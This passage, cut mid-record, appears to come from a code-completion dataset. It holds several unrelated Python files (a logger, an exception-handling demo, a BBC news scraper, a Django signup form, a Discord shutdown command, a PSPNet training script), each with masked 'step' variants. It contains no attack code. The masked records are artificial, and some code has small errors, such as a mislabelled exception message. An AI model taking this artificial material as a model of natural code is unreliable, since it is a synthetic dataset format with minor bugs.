"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nA customised logger for this project for logging to the file and console\nCreated on 29/07/2022\n@author: PNimbhore\n\"\"\"\n# imports\nimport os\nimport logging\n\n\nclass Logger:\n \"\"\"\n A custom logger which will take care\n of logging to console and file.\n \"\"\"\n def __init__(self, filepath):\n \"\"\"\n Constructor\n :param filepath:\n \"\"\"\n self.filepath = filepath\n self.logger = logging.getLogger('util')\n self.logger.setLevel(logging.DEBUG)\n self._formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n # file handler\n file_handller = logging.FileHandler(os.path.join(self.filepath), 'a')\n file_handller.setLevel(logging.DEBUG)\n file_handller.setFormatter(self._formatter)\n self.logger.addHandler(file_handller)\n # console handler\n con_handler = logging.StreamHandler()\n con_handler.setLevel(logging.ERROR)\n con_handler.setFormatter(self._formatter)\n self.logger.addHandler(con_handler)\n\n\nlog_file = \"slb_config.log\"\nlogger = Logger(log_file).logger\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
#-*- coding: utf-8 -*-
s = "123"
try:
print(int(s) + 1)
print(int(s) / 1)
except ValueError as ve:
print("ValueError occurs!!!", ve)
except ZeroDivisionError as e:
print("ValueError occurs!!!", e)
except :
print("Error occurs!!!")
else:
print("elseeeeeeeeeeeeeee")
finally:
print("ABCDEFG")
# try:
#     # code that may raise an exception
# except:
#     # statements handled when an exception occurs
# except:
#     pass # swallow it?!
# else:
#     # runs only when no exception occurred
# finally:
#     # runs whether or not an exception occurred
|
normal
|
{
"blob_id": "1bf79319613ca1454f3a9ed21068bd899616395c",
"index": 624,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ntry:\n print(int(s) + 1)\n print(int(s) / 1)\nexcept ValueError as ve:\n print('ValueError occurs!!!', ve)\nexcept ZeroDivisionError as e:\n print('ValueError occurs!!!', e)\nexcept:\n print('Error occurs!!!')\nelse:\n print('elseeeeeeeeeeeeeee')\nfinally:\n print('ABCDEFG')\n",
"step-3": "s = '123'\ntry:\n print(int(s) + 1)\n print(int(s) / 1)\nexcept ValueError as ve:\n print('ValueError occurs!!!', ve)\nexcept ZeroDivisionError as e:\n print('ValueError occurs!!!', e)\nexcept:\n print('Error occurs!!!')\nelse:\n print('elseeeeeeeeeeeeeee')\nfinally:\n print('ABCDEFG')\n",
"step-4": "#-*- coding: utf-8 -*-\ns = \"123\"\n\ntry:\n print(int(s) + 1)\n print(int(s) / 1)\n\nexcept ValueError as ve:\n print(\"ValueError occurs!!!\", ve)\n\nexcept ZeroDivisionError as e:\n print(\"ValueError occurs!!!\", e)\n\nexcept :\n print(\"Error occurs!!!\")\n\nelse:\n print(\"elseeeeeeeeeeeeeee\")\n\nfinally:\n print(\"ABCDEFG\")\n\n# try:\n# # 예외 발생 가능 코드들\n# except:\n# # 예외시 처리될 구문\n# except:\n# pass #씹겠다?!\n# else:\n# #예외가 없을 경우 실행되는 부분\n\n# finally:\n# #예외가 있던 없던 실행되는 부분",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
""" [BBC] Web Scraper """
import os
from .abstract_crawler import AbstractWebCrawler
class BBCCrawler(AbstractWebCrawler):
""" [BBC] Web Scraper """
# Spider Properties
name = "web_bbc"
# Crawler Properties
resource_link = 'http://www.bbc.com/news/topics/cz4pr2gd85qt/cyber-security'
resource_label = 'bbc'
# TODO Move it to the super class
custom_settings = {
'ITEM_PIPELINES': {
'scrapy_crawlers.pipelines.ElasticIndexPipeline': 500
}
}
links_to_articles_query = 'article > header > div > h3 > a::attr(href)'
links_to_pages_query = 'dummy' # dynamic ajax pagination
extract_title_query = '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > h1::text'
extract_datetime_query = '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.with-extracted-share-icons > div > div.story-body__mini-info-list-and-share-row > div.mini-info-list-wrap > ul > li > div::text'
extract_content_query = '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.story-body__inner'
|
normal
|
{
"blob_id": "3c22fbfd7d83ff3ecacabc3c88af2169fa5906b9",
"index": 5190,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass BBCCrawler(AbstractWebCrawler):\n <mask token>\n name = 'web_bbc'\n resource_link = (\n 'http://www.bbc.com/news/topics/cz4pr2gd85qt/cyber-security')\n resource_label = 'bbc'\n custom_settings = {'ITEM_PIPELINES': {\n 'scrapy_crawlers.pipelines.ElasticIndexPipeline': 500}}\n links_to_articles_query = 'article > header > div > h3 > a::attr(href)'\n links_to_pages_query = 'dummy'\n extract_title_query = (\n '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > h1::text'\n )\n extract_datetime_query = (\n '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.with-extracted-share-icons > div > div.story-body__mini-info-list-and-share-row > div.mini-info-list-wrap > ul > li > div::text'\n )\n extract_content_query = (\n '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.story-body__inner'\n )\n",
"step-3": "<mask token>\n\n\nclass BBCCrawler(AbstractWebCrawler):\n \"\"\" [BBC] Web Scraper \"\"\"\n name = 'web_bbc'\n resource_link = (\n 'http://www.bbc.com/news/topics/cz4pr2gd85qt/cyber-security')\n resource_label = 'bbc'\n custom_settings = {'ITEM_PIPELINES': {\n 'scrapy_crawlers.pipelines.ElasticIndexPipeline': 500}}\n links_to_articles_query = 'article > header > div > h3 > a::attr(href)'\n links_to_pages_query = 'dummy'\n extract_title_query = (\n '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > h1::text'\n )\n extract_datetime_query = (\n '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.with-extracted-share-icons > div > div.story-body__mini-info-list-and-share-row > div.mini-info-list-wrap > ul > li > div::text'\n )\n extract_content_query = (\n '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.story-body__inner'\n )\n",
"step-4": "<mask token>\nimport os\nfrom .abstract_crawler import AbstractWebCrawler\n\n\nclass BBCCrawler(AbstractWebCrawler):\n \"\"\" [BBC] Web Scraper \"\"\"\n name = 'web_bbc'\n resource_link = (\n 'http://www.bbc.com/news/topics/cz4pr2gd85qt/cyber-security')\n resource_label = 'bbc'\n custom_settings = {'ITEM_PIPELINES': {\n 'scrapy_crawlers.pipelines.ElasticIndexPipeline': 500}}\n links_to_articles_query = 'article > header > div > h3 > a::attr(href)'\n links_to_pages_query = 'dummy'\n extract_title_query = (\n '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > h1::text'\n )\n extract_datetime_query = (\n '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.with-extracted-share-icons > div > div.story-body__mini-info-list-and-share-row > div.mini-info-list-wrap > ul > li > div::text'\n )\n extract_content_query = (\n '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.story-body__inner'\n )\n",
"step-5": "\"\"\" [BBC] Web Scraper \"\"\"\n\nimport os\nfrom .abstract_crawler import AbstractWebCrawler\n\n\nclass BBCCrawler(AbstractWebCrawler):\n \"\"\" [BBC] Web Scraper \"\"\"\n\n # Spider Properties\n name = \"web_bbc\"\n\n # Crawler Properties\n resource_link = 'http://www.bbc.com/news/topics/cz4pr2gd85qt/cyber-security'\n resource_label = 'bbc'\n\n # TODO Move it to the super class\n custom_settings = {\n 'ITEM_PIPELINES': {\n 'scrapy_crawlers.pipelines.ElasticIndexPipeline': 500\n }\n }\n\n links_to_articles_query = 'article > header > div > h3 > a::attr(href)'\n links_to_pages_query = 'dummy' # dynamic ajax pagination\n extract_title_query = '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > h1::text'\n extract_datetime_query = '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.with-extracted-share-icons > div > div.story-body__mini-info-list-and-share-row > div.mini-info-list-wrap > ul > li > div::text'\n extract_content_query = '#page > div:nth-child(1) > div.container > div > div.column--primary > div.story-body > div.story-body__inner'\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
from django import forms
from django.core.validators import RegexValidator
from dashboard.validators import validate_domainonly_email
class addUserForm(forms.Form):
username = forms.CharField(label='User Name', required="required", disabled="", min_length=6, max_length=128,
help_text="",
widget=forms.TextInput(
attrs={
'style': '',
'placeholder': '',
}
))
first_name = forms.CharField(label='First Name', required="required", disabled="", min_length=3, max_length=128,
help_text="")
last_name = forms.CharField(label='Last Name', required="required", disabled="", min_length=3, max_length=128,
help_text="")
email = forms.EmailField(label='Email', required="required", disabled="", min_length=6, max_length=128,
help_text="", validators=[validate_domainonly_email])
password = forms.CharField(label='Password', required="required", disabled="", min_length=6, max_length=128,
help_text="", validators=[
RegexValidator('^(\w+\d+|\d+\w+)+$', message="Password should be a combination of Alphabets and Numbers")])
confirm_password = forms.CharField(label='Confirm Password', required="required", disabled="", min_length=6,
max_length=128,
help_text="")
def clean(self):
cleaned_data = super(addUserForm, self).clean()
username = cleaned_data.get('username')
first_name = cleaned_data.get('first_name')
last_name = cleaned_data.get('last_name')
email = cleaned_data.get('email')
password = cleaned_data.get('password')
confirm_password = cleaned_data.get('confirm_password')
if not username and not first_name and not last_name and not email and not password and not confirm_password:
raise forms.ValidationError('There are errors in the fields...!')
# class editUserForm(forms.Form):
# username = forms.CharField(label='User Name', required="required", disabled="disabled", min_length="6",
# max_length=128, help_text="")
# first_name = forms.CharField(label='First Name', max_length=254, help_text="")
# last_name = forms.CharField(label='Last Name', max_length=254, help_text="")
# email = forms.EmailField(label='Email', max_length=8, help_text="")
#
# def clean(self):
# cleaned_data = super(editUserForm, self).clean()
# username = cleaned_data.get('username')
# first_name = cleaned_data.get('first_name')
# last_name = cleaned_data.get('last_name')
# email = cleaned_data.get('email')
# if not username and not first_name and not last_name and not email:
# raise forms.ValidationError('There are errors in the fields...!')
|
normal
|
{
"blob_id": "39b6ca21b8d4856e2b2edfcbd00b75fbce6dfff7",
"index": 1407,
"step-1": "<mask token>\n\n\nclass addUserForm(forms.Form):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass addUserForm(forms.Form):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def clean(self):\n cleaned_data = super(addUserForm, self).clean()\n username = cleaned_data.get('username')\n first_name = cleaned_data.get('first_name')\n last_name = cleaned_data.get('last_name')\n email = cleaned_data.get('email')\n password = cleaned_data.get('password')\n confirm_password = cleaned_data.get('confirm_password')\n if (not username and not first_name and not last_name and not email and\n not password and not confirm_password):\n raise forms.ValidationError('There are errors in the fields...!')\n",
"step-3": "<mask token>\n\n\nclass addUserForm(forms.Form):\n username = forms.CharField(label='User Name', required='required',\n disabled='', min_length=6, max_length=128, help_text='', widget=\n forms.TextInput(attrs={'style': '', 'placeholder': ''}))\n first_name = forms.CharField(label='First Name', required='required',\n disabled='', min_length=3, max_length=128, help_text='')\n last_name = forms.CharField(label='Last Name', required='required',\n disabled='', min_length=3, max_length=128, help_text='')\n email = forms.EmailField(label='Email', required='required', disabled=\n '', min_length=6, max_length=128, help_text='', validators=[\n validate_domainonly_email])\n password = forms.CharField(label='Password', required='required',\n disabled='', min_length=6, max_length=128, help_text='', validators\n =[RegexValidator('^(\\\\w+\\\\d+|\\\\d+\\\\w+)+$', message=\n 'Password should be a combination of Alphabets and Numbers')])\n confirm_password = forms.CharField(label='Confirm Password', required=\n 'required', disabled='', min_length=6, max_length=128, help_text='')\n\n def clean(self):\n cleaned_data = super(addUserForm, self).clean()\n username = cleaned_data.get('username')\n first_name = cleaned_data.get('first_name')\n last_name = cleaned_data.get('last_name')\n email = cleaned_data.get('email')\n password = cleaned_data.get('password')\n confirm_password = cleaned_data.get('confirm_password')\n if (not username and not first_name and not last_name and not email and\n not password and not confirm_password):\n raise forms.ValidationError('There are errors in the fields...!')\n",
"step-4": "from django import forms\nfrom django.core.validators import RegexValidator\nfrom dashboard.validators import validate_domainonly_email\n\n\nclass addUserForm(forms.Form):\n username = forms.CharField(label='User Name', required='required',\n disabled='', min_length=6, max_length=128, help_text='', widget=\n forms.TextInput(attrs={'style': '', 'placeholder': ''}))\n first_name = forms.CharField(label='First Name', required='required',\n disabled='', min_length=3, max_length=128, help_text='')\n last_name = forms.CharField(label='Last Name', required='required',\n disabled='', min_length=3, max_length=128, help_text='')\n email = forms.EmailField(label='Email', required='required', disabled=\n '', min_length=6, max_length=128, help_text='', validators=[\n validate_domainonly_email])\n password = forms.CharField(label='Password', required='required',\n disabled='', min_length=6, max_length=128, help_text='', validators\n =[RegexValidator('^(\\\\w+\\\\d+|\\\\d+\\\\w+)+$', message=\n 'Password should be a combination of Alphabets and Numbers')])\n confirm_password = forms.CharField(label='Confirm Password', required=\n 'required', disabled='', min_length=6, max_length=128, help_text='')\n\n def clean(self):\n cleaned_data = super(addUserForm, self).clean()\n username = cleaned_data.get('username')\n first_name = cleaned_data.get('first_name')\n last_name = cleaned_data.get('last_name')\n email = cleaned_data.get('email')\n password = cleaned_data.get('password')\n confirm_password = cleaned_data.get('confirm_password')\n if (not username and not first_name and not last_name and not email and\n not password and not confirm_password):\n raise forms.ValidationError('There are errors in the fields...!')\n",
"step-5": "from django import forms\nfrom django.core.validators import RegexValidator\nfrom dashboard.validators import validate_domainonly_email\n\n\nclass addUserForm(forms.Form):\n username = forms.CharField(label='User Name', required=\"required\", disabled=\"\", min_length=6, max_length=128,\n help_text=\"\",\n widget=forms.TextInput(\n attrs={\n 'style': '',\n 'placeholder': '',\n }\n ))\n first_name = forms.CharField(label='First Name', required=\"required\", disabled=\"\", min_length=3, max_length=128,\n help_text=\"\")\n last_name = forms.CharField(label='Last Name', required=\"required\", disabled=\"\", min_length=3, max_length=128,\n help_text=\"\")\n email = forms.EmailField(label='Email', required=\"required\", disabled=\"\", min_length=6, max_length=128,\n help_text=\"\", validators=[validate_domainonly_email])\n\n password = forms.CharField(label='Password', required=\"required\", disabled=\"\", min_length=6, max_length=128,\n help_text=\"\", validators=[\n RegexValidator('^(\\w+\\d+|\\d+\\w+)+$', message=\"Password should be a combination of Alphabets and Numbers\")])\n confirm_password = forms.CharField(label='Confirm Password', required=\"required\", disabled=\"\", min_length=6,\n max_length=128,\n help_text=\"\")\n\n def clean(self):\n cleaned_data = super(addUserForm, self).clean()\n username = cleaned_data.get('username')\n first_name = cleaned_data.get('first_name')\n last_name = cleaned_data.get('last_name')\n email = cleaned_data.get('email')\n password = cleaned_data.get('password')\n confirm_password = cleaned_data.get('confirm_password')\n if not username and not first_name and not last_name and not email and not password and not confirm_password:\n raise forms.ValidationError('There are errors in the fields...!')\n\n# class editUserForm(forms.Form):\n# username = forms.CharField(label='User Name', required=\"required\", disabled=\"disabled\", min_length=\"6\",\n# max_length=128, help_text=\"\")\n# first_name = forms.CharField(label='First Name', max_length=254, help_text=\"\")\n# last_name = forms.CharField(label='Last Name', max_length=254, help_text=\"\")\n# email = forms.EmailField(label='Email', max_length=8, help_text=\"\")\n#\n# def clean(self):\n# cleaned_data = super(editUserForm, self).clean()\n# username = cleaned_data.get('username')\n# first_name = cleaned_data.get('first_name')\n# last_name = cleaned_data.get('last_name')\n# email = cleaned_data.get('email')\n# if not username and not first_name and not last_name and not email:\n# raise forms.ValidationError('There are errors in the fields...!')\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from discord.ext import commands
def is_owner():
async def predicate(ctx):
return ctx.author.id == 98208218022428672
return commands.check(predicate)
class Staff(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(
name='stop',
aliases=['shutdown'],
description='This is a command for staff only to stop the bot'
)
@is_owner()
async def stop_bot(self, ctx):
"""Shutdown the bot"""
await ctx.send('Oh, alright... I\'ll just shutup I guess.. :wave:')
await self.bot.close()
|
normal
|
{
"blob_id": "23b2cc5b561a11ae7757a281a141491d5b7e23ca",
"index": 2683,
"step-1": "<mask token>\n\n\nclass Staff(commands.Cog):\n <mask token>\n\n @commands.command(name='stop', aliases=['shutdown'], description=\n 'This is a command for staff only to stop the bot')\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send(\"Oh, alright... I'll just shutup I guess.. :wave:\")\n await self.bot.close()\n",
"step-2": "<mask token>\n\n\nclass Staff(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='stop', aliases=['shutdown'], description=\n 'This is a command for staff only to stop the bot')\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send(\"Oh, alright... I'll just shutup I guess.. :wave:\")\n await self.bot.close()\n",
"step-3": "<mask token>\n\n\ndef is_owner():\n\n async def predicate(ctx):\n return ctx.author.id == 98208218022428672\n return commands.check(predicate)\n\n\nclass Staff(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='stop', aliases=['shutdown'], description=\n 'This is a command for staff only to stop the bot')\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send(\"Oh, alright... I'll just shutup I guess.. :wave:\")\n await self.bot.close()\n",
"step-4": "from discord.ext import commands\n\n\ndef is_owner():\n\n async def predicate(ctx):\n return ctx.author.id == 98208218022428672\n return commands.check(predicate)\n\n\nclass Staff(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='stop', aliases=['shutdown'], description=\n 'This is a command for staff only to stop the bot')\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send(\"Oh, alright... I'll just shutup I guess.. :wave:\")\n await self.bot.close()\n",
"step-5": "from discord.ext import commands\n\n\ndef is_owner():\n async def predicate(ctx):\n return ctx.author.id == 98208218022428672\n\n return commands.check(predicate)\n\n\nclass Staff(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(\n name='stop',\n aliases=['shutdown'],\n description='This is a command for staff only to stop the bot'\n )\n @is_owner()\n async def stop_bot(self, ctx):\n \"\"\"Shutdown the bot\"\"\"\n await ctx.send('Oh, alright... I\\'ll just shutup I guess.. :wave:')\n await self.bot.close()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# Author: BeiYu
# Github: https://github.com/beiyuouo
# Date : 2021/2/21 21:57
# Description:
__author__ = "BeiYu"
from utils.init_env import set_seed
from utils.options import *
import os
import logging
import torch
from torch import nn
from torch import optim
from torch.optim.lr_scheduler import MultiStepLR
from torch.autograd import Variable
from torch.utils.data import DataLoader
from modules.seg_dataset import *
from tqdm import tqdm
import click
import torch.nn.functional as F
import numpy as np
from modules.seg import PSPNet
models = {
'squeezenet': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='squeezenet', n_classes=3),
'densenet': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=1024, deep_features_size=512, backend='densenet', n_classes=3),
'resnet18': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='resnet18', n_classes=3),
'resnet34': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend='resnet34', n_classes=3),
'resnet50': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet50', n_classes=3),
'resnet101': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet101', n_classes=3),
'resnet152': lambda: PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend='resnet152', n_classes=3)
}
def build_network(snapshot, backend):
epoch = 0
backend = backend.lower()
net = models[backend]()
# net = nn.DataParallel(net)
if snapshot is not None:
_, epoch = os.path.basename(snapshot).split('_')
epoch = int(epoch)
net.load_state_dict(torch.load(snapshot))
logging.info("Snapshot for epoch {} loaded from {}".format(epoch, snapshot))
net = net.cuda(0)
return net, epoch
def train():
args = get_args()
# os.environ["CUDA_VISIBLE_DEVICES"] = gpu
# net, starting_epoch = build_network(snapshot, backend)
# data_path = os.path.abspath(os.path.expanduser(data_path))
# models_path = os.path.abspath(os.path.expanduser(models_path))
os.makedirs(args.model_path, exist_ok=True)
set_seed(args.seed)
'''
To follow this training routine you need a DataLoader that yields the tuples of the following format:
(Bx3xHxW FloatTensor x, BxHxW LongTensor y, BxN LongTensor y_cls) where
x - batch of input images,
y - batch of groung truth seg maps,
y_cls - batch of 1D tensors of dimensionality N: N total number of classes,
y_cls[i, T] = 1 if class T is present in image i, 0 otherwise
'''
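    # Illustrative sketch only (not part of the original script): with a batch size
    # of 4, n_classes = 3 and 256x256 crops, one yielded tuple would be shaped like
    #   x     -> FloatTensor (4, 3, 256, 256)   # input images
    #   y     -> LongTensor  (4, 256, 256)      # per-pixel class ids in [0, 3)
    #   y_cls -> Tensor      (4, 3)             # y_cls[i, T] = 1 if class T occurs in image i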
traindata = HeadSegData(args.seg_data_path, args.train_txt, train=True)
train_loader = DataLoader(traindata, batch_size=args.seg_batch_size, shuffle=True, num_workers=1)
net, _ = build_network(None, args.seg_backend)
seg_criterion = nn.NLLLoss().cuda(0)
cls_criterion = nn.BCEWithLogitsLoss().cuda(0)
optimizer = optim.Adam(net.parameters(), lr=args.seg_lr)
# scheduler = MultiStepLR(optimizer, milestones=[int(x) for x in milestones.split(',')])
print("start training...")
net.train()
total_loss = 0.0
for epoch in range(args.seg_epochs):
if (epoch+1) % 5 == 0:
for group in optimizer.param_groups:
group['lr'] *= 0.25
total_loss = 0.0
for i, (x, y, y_cls) in enumerate(train_loader):
x, y, y_cls = x.cuda(0), y.cuda(0).long(), y_cls.cuda(0).float()
out, out_cls = net(x)
# print(x.shape, out.shape, out_cls.shape, y.shape, y_cls.shape)
seg_loss = seg_criterion(out, y)
cls_loss = cls_criterion(out_cls, y_cls)
loss = seg_loss + args.seg_alpha * cls_loss
total_loss += loss.item()
if i % 50 == 0:
status = '[batch:{0}/{1} epoch:{2}] loss = {3:0.5f}'.format(i, len(traindata) // args.seg_batch_size,
epoch + 1,
loss.item())
print(status)
optimizer.zero_grad()
loss.backward()
optimizer.step()
torch.save(net.state_dict(), os.path.join(args.model_path,
f'{"seg"}_{args.seg_model}_{args.seg_backend}_{epoch}.pth'))
print(f'epoch:{epoch} total_loss: {total_loss / len(traindata)}')
if __name__ == '__main__':
train()
|
normal
|
{
"blob_id": "75e6554ea3c327c87a2a65710a7f1d55e9933bb0",
"index": 276,
"step-1": "<mask token>\n\n\ndef train():\n args = get_args()\n os.makedirs(args.model_path, exist_ok=True)\n set_seed(args.seed)\n \"\"\"\n To follow this training routine you need a DataLoader that yields the tuples of the following format:\n (Bx3xHxW FloatTensor x, BxHxW LongTensor y, BxN LongTensor y_cls) where\n x - batch of input images,\n y - batch of groung truth seg maps,\n y_cls - batch of 1D tensors of dimensionality N: N total number of classes, \n y_cls[i, T] = 1 if class T is present in image i, 0 otherwise\n \"\"\"\n traindata = HeadSegData(args.seg_data_path, args.train_txt, train=True)\n train_loader = DataLoader(traindata, batch_size=args.seg_batch_size,\n shuffle=True, num_workers=1)\n net, _ = build_network(None, args.seg_backend)\n seg_criterion = nn.NLLLoss().cuda(0)\n cls_criterion = nn.BCEWithLogitsLoss().cuda(0)\n optimizer = optim.Adam(net.parameters(), lr=args.seg_lr)\n print('start training...')\n net.train()\n total_loss = 0.0\n for epoch in range(args.seg_epochs):\n if (epoch + 1) % 5 == 0:\n for group in optimizer.param_groups:\n group['lr'] *= 0.25\n total_loss = 0.0\n for i, (x, y, y_cls) in enumerate(train_loader):\n x, y, y_cls = x.cuda(0), y.cuda(0).long(), y_cls.cuda(0).float()\n out, out_cls = net(x)\n seg_loss = seg_criterion(out, y)\n cls_loss = cls_criterion(out_cls, y_cls)\n loss = seg_loss + args.seg_alpha * cls_loss\n total_loss += loss.item()\n if i % 50 == 0:\n status = '[batch:{0}/{1} epoch:{2}] loss = {3:0.5f}'.format(i,\n len(traindata) // args.seg_batch_size, epoch + 1, loss.\n item())\n print(status)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n torch.save(net.state_dict(), os.path.join(args.model_path,\n f\"{'seg'}_{args.seg_model}_{args.seg_backend}_{epoch}.pth\"))\n print(f'epoch:{epoch} total_loss: {total_loss / len(traindata)}')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef build_network(snapshot, backend):\n epoch = 0\n backend = backend.lower()\n net = models[backend]()\n if snapshot is not None:\n _, epoch = os.path.basename(snapshot).split('_')\n epoch = int(epoch)\n net.load_state_dict(torch.load(snapshot))\n logging.info('Snapshot for epoch {} loaded from {}'.format(epoch,\n snapshot))\n net = net.cuda(0)\n return net, epoch\n\n\ndef train():\n args = get_args()\n os.makedirs(args.model_path, exist_ok=True)\n set_seed(args.seed)\n \"\"\"\n To follow this training routine you need a DataLoader that yields the tuples of the following format:\n (Bx3xHxW FloatTensor x, BxHxW LongTensor y, BxN LongTensor y_cls) where\n x - batch of input images,\n y - batch of groung truth seg maps,\n y_cls - batch of 1D tensors of dimensionality N: N total number of classes, \n y_cls[i, T] = 1 if class T is present in image i, 0 otherwise\n \"\"\"\n traindata = HeadSegData(args.seg_data_path, args.train_txt, train=True)\n train_loader = DataLoader(traindata, batch_size=args.seg_batch_size,\n shuffle=True, num_workers=1)\n net, _ = build_network(None, args.seg_backend)\n seg_criterion = nn.NLLLoss().cuda(0)\n cls_criterion = nn.BCEWithLogitsLoss().cuda(0)\n optimizer = optim.Adam(net.parameters(), lr=args.seg_lr)\n print('start training...')\n net.train()\n total_loss = 0.0\n for epoch in range(args.seg_epochs):\n if (epoch + 1) % 5 == 0:\n for group in optimizer.param_groups:\n group['lr'] *= 0.25\n total_loss = 0.0\n for i, (x, y, y_cls) in enumerate(train_loader):\n x, y, y_cls = x.cuda(0), y.cuda(0).long(), y_cls.cuda(0).float()\n out, out_cls = net(x)\n seg_loss = seg_criterion(out, y)\n cls_loss = cls_criterion(out_cls, y_cls)\n loss = seg_loss + args.seg_alpha * cls_loss\n total_loss += loss.item()\n if i % 50 == 0:\n status = '[batch:{0}/{1} epoch:{2}] loss = {3:0.5f}'.format(i,\n len(traindata) // args.seg_batch_size, epoch + 1, loss.\n item())\n print(status)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n torch.save(net.state_dict(), os.path.join(args.model_path,\n f\"{'seg'}_{args.seg_model}_{args.seg_backend}_{epoch}.pth\"))\n print(f'epoch:{epoch} total_loss: {total_loss / len(traindata)}')\n\n\nif __name__ == '__main__':\n train()\n",
"step-3": "__author__ = 'BeiYu'\n<mask token>\nmodels = {'squeezenet': lambda : PSPNet(sizes=(1, 2, 3, 6), psp_size=512,\n deep_features_size=256, backend='squeezenet', n_classes=3), 'densenet':\n lambda : PSPNet(sizes=(1, 2, 3, 6), psp_size=1024, deep_features_size=\n 512, backend='densenet', n_classes=3), 'resnet18': lambda : PSPNet(\n sizes=(1, 2, 3, 6), psp_size=512, deep_features_size=256, backend=\n 'resnet18', n_classes=3), 'resnet34': lambda : PSPNet(sizes=(1, 2, 3, 6\n ), psp_size=512, deep_features_size=256, backend='resnet34', n_classes=\n 3), 'resnet50': lambda : PSPNet(sizes=(1, 2, 3, 6), psp_size=2048,\n deep_features_size=1024, backend='resnet50', n_classes=3), 'resnet101':\n lambda : PSPNet(sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=\n 1024, backend='resnet101', n_classes=3), 'resnet152': lambda : PSPNet(\n sizes=(1, 2, 3, 6), psp_size=2048, deep_features_size=1024, backend=\n 'resnet152', n_classes=3)}\n\n\ndef build_network(snapshot, backend):\n epoch = 0\n backend = backend.lower()\n net = models[backend]()\n if snapshot is not None:\n _, epoch = os.path.basename(snapshot).split('_')\n epoch = int(epoch)\n net.load_state_dict(torch.load(snapshot))\n logging.info('Snapshot for epoch {} loaded from {}'.format(epoch,\n snapshot))\n net = net.cuda(0)\n return net, epoch\n\n\ndef train():\n args = get_args()\n os.makedirs(args.model_path, exist_ok=True)\n set_seed(args.seed)\n \"\"\"\n To follow this training routine you need a DataLoader that yields the tuples of the following format:\n (Bx3xHxW FloatTensor x, BxHxW LongTensor y, BxN LongTensor y_cls) where\n x - batch of input images,\n y - batch of groung truth seg maps,\n y_cls - batch of 1D tensors of dimensionality N: N total number of classes, \n y_cls[i, T] = 1 if class T is present in image i, 0 otherwise\n \"\"\"\n traindata = HeadSegData(args.seg_data_path, args.train_txt, train=True)\n train_loader = DataLoader(traindata, batch_size=args.seg_batch_size,\n shuffle=True, num_workers=1)\n net, _ = build_network(None, args.seg_backend)\n seg_criterion = nn.NLLLoss().cuda(0)\n cls_criterion = nn.BCEWithLogitsLoss().cuda(0)\n optimizer = optim.Adam(net.parameters(), lr=args.seg_lr)\n print('start training...')\n net.train()\n total_loss = 0.0\n for epoch in range(args.seg_epochs):\n if (epoch + 1) % 5 == 0:\n for group in optimizer.param_groups:\n group['lr'] *= 0.25\n total_loss = 0.0\n for i, (x, y, y_cls) in enumerate(train_loader):\n x, y, y_cls = x.cuda(0), y.cuda(0).long(), y_cls.cuda(0).float()\n out, out_cls = net(x)\n seg_loss = seg_criterion(out, y)\n cls_loss = cls_criterion(out_cls, y_cls)\n loss = seg_loss + args.seg_alpha * cls_loss\n total_loss += loss.item()\n if i % 50 == 0:\n status = '[batch:{0}/{1} epoch:{2}] loss = {3:0.5f}'.format(i,\n len(traindata) // args.seg_batch_size, epoch + 1, loss.\n item())\n print(status)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n torch.save(net.state_dict(), 